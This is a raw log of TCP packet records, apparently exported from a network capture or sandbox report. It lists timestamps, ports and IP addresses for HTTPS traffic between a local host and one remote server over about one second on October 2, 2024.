                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691440105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691468000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691497087 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691517115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691823959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691874981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691898108 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691906929 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691930056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.691945076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692363977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692408085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692436934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692445040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692467928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692483902 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692688942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692764044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692778111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692846060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.692960978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693003893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693028927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693036079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693058968 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693074942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693612099 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693667889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693697929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693705082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693727016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.693742990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781053066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781078100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781218052 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781254053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781301022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781527042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781543970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781606913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781614065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.781653881 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782027006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782042980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782099962 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782114029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782151937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782515049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782531023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782589912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782598019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.782635927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783232927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783248901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783310890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783322096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783360004 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783483982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783499956 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783552885 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783560038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.783598900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.784039021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.784056902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.784104109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.784113884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.784130096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.784151077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.784187078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.871911049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.871942043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872082949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872117996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872167110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872555017 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872572899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872633934 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872643948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872678041 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872769117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872783899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872840881 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872848988 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.872898102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873100996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873116970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873168945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873176098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873210907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873703957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873720884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873764038 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873770952 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873794079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.873810053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874146938 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874165058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874212980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874213934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874233961 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874252081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874273062 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874279976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874300957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874316931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874928951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874946117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.874996901 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.875005007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.875037909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.962657928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.962685108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.962724924 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.962745905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.962759972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.962779999 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963030100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963047028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963077068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963083982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963114023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963130951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963551044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963570118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963599920 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963607073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963629007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963648081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963886023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963901997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963947058 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963954926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.963987112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964458942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964477062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964519978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964528084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964560986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964677095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964694977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964725018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964730978 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964754105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.964771032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965430975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965451002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965482950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965491056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965511084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965524912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965858936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965874910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965900898 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965908051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965930939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:53.965945959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053162098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053200006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053246021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053272963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053287983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053309917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053518057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053539038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053571939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053580046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053606987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053622007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053977013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.053999901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054040909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054047108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054075956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054094076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054617882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054647923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054698944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054708958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054723024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054764032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054768085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054783106 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.054811954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.055253983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.055283070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.055346012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.055354118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.055403948 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.055694103 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.055933952 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.055962086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.056003094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.056010962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.056045055 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.056303024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.056324005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.056368113 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.056375027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.056407928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144011021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144037008 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144157887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144186974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144236088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144386053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144403934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144467115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144474030 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144515038 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144803047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144820929 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144886017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144892931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.144932032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145381927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145401955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145454884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145461082 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145472050 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145509005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145519972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145525932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.145570040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146048069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146066904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146128893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146130085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146142006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146171093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146189928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146197081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146222115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.146239042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.147193909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.147213936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.147272110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.147280931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.147320032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234534025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234563112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234698057 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234731913 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234781027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234895945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234915018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234971046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.234978914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235021114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235382080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235414028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235466957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235475063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235512972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235827923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235846043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235897064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235904932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.235944033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236366034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236392021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236433983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236442089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:54.236453056 CEST44349713167.114.14.168192.168.2.7
